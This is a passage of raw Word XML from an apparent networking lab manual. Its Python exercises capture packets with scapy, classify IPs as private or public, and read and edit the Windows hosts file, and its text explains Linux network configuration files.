        <w:ind w:left="1277" w:right="2222"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sniff(prn=capture_packets,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count=50)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Capture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50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packets # Visualization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5220C1FF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="1277" w:right="5229"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ips = list(ip_count.keys()) counts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list(ip_count.values())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF2DB3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A49129B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1277" w:right="4861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plt.figure(figsize=(10,5)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>plt.bar(ips,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counts,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color='blue') </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plt.xticks(rotation=45) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>plt.xlabel("IP Addresses") plt.ylabel("Number of Packets")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B9156" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1277" w:right="3449"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>plt.title("IP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Allocation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Analysis") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>plt.show()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E35F97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74D70B67" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DD6FD1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62179970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14:paraId="3E6648E9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7507E9B5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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private and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>public IP addresses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masks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DC781" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 script to classify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IPs based on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>subnets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB785A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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snippet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10450265" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42798D2C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/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ipaddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C299877" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72CAF202" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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classify_ip(ip):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB31C54" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="1757" w:right="4540"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ip_obj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ipaddress.ip_address(ip) if ip_obj.is_private:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852A80B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1757" w:right="5720" w:firstLine="48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"Private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IP" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46058CA1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2237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"Public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IP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF0E623" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="1277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ip_count.keys():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB9AAE5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="2717"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print(f"{ip}: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pacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{classify_ip(ip)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE1FC1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22752607" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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captured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IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03409823" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60193607" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360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Outcome: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◻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2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>captured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analyzed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A970B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="606"/>
        </w:tabs>
        <w:ind w:left="606" w:hanging="246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displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC14C13" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="608"/>
        </w:tabs>
        <w:ind w:left="608" w:hanging="248"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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public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7E904EE3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2F6071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78" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="558"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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such as /etc/hosts, /etc/resolv.conf, and /etc/network/interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119379D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="275" w:line="272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61B5D5B7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="272" w:lineRule="exact"/>
        <w:ind w:left="360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modifies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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17D4C40F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/hosts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rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/resolv.conf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rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/network/interfaces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587224E7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DFE8743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1897EAE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71BB0C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(Ubuntu,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Debian,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CentOS, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C58BA3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z w:val="24"/>
        </w:rPr>
        <w:t>Nano,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etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ECFBF2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288A2139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562944EC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0845FAF0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2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB87D8F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B5D5E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-62"/>
          <w:sz w:val="20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Maps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hostnames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addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAE730" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="284" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/resolv.conf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DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>resolver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configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E3FD18" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="8" w:line="230" w:lineRule="auto"/>
        <w:ind w:right="859"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/network/interfaces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settings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6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Debian- based systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267167B3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A3F9AB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4"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AE0571" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="18"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67137E3D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="230" w:lineRule="auto"/>
        <w:ind w:right="157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network_config.py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 configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DEE138" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="3"/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files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73133D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB5C23B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="7731"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import os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shutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE93EAE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51166CC1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Windows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location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64571642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HOSTS_FILE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r"C:\Windows\System32\drivers\etc\hosts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFDBC43" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502C51D2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read_hosts():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4BCC51" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1560" w:right="1143"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"""Reads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displays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contents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Windows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file.""" if not os.path.exists(HOSTS_FILE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA0FE7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2040" w:right="3449"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("[ERROR]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found!") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1370C78B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 w14:paraId="68A3E2EE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open(HOSTS_FILE,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'r')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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7245B094" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="2520" w:right="783"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("\n=====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Contents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 xml:space="preserve">=====\n") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print(file.read())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76942216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5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEC9DCE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print(f"[ERROR]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file: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{e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6EAC66" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D88040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63BCDDC1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 and verify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output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F943264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5E1B24" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="76"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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 xml:space="preserve">Configuration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4414BC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADC5646" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92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/etc/hosts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hostname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mapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E69D70" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77329BA4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="183"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B89C721" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"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modify_hosts():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA93434" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1560" w:right="1143"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"""Adds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custom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hostname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mapping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Windows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file.""" if not os.path.exists(HOSTS_FILE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39446211" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="3449"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("[ERROR]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found!") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F730257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 w14:paraId="4A2D871E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="2701"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># Backup the hosts file before modifying shutil.copy(HOSTS_FILE,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HOSTS_FILE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".bak") with open(HOSTS_FILE, "a") as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA556A0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="204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file.write("\n192.168.1.100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mycustomhost\n") print("[SUCCESS] Hosts file updated.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F911F8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32330267" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2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print(f"[ERROR]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update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file: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{e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F002CE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A88D6D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58465A59" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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1E04FAAD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4011795E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restart_network():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969DFAA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1560" w:right="3449"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"""Flushes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DNS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cache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apply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changes.""" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB678C3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os.system("ipconfig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pacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/flushdns")</w:t>
      </w:r>
    </w:p>
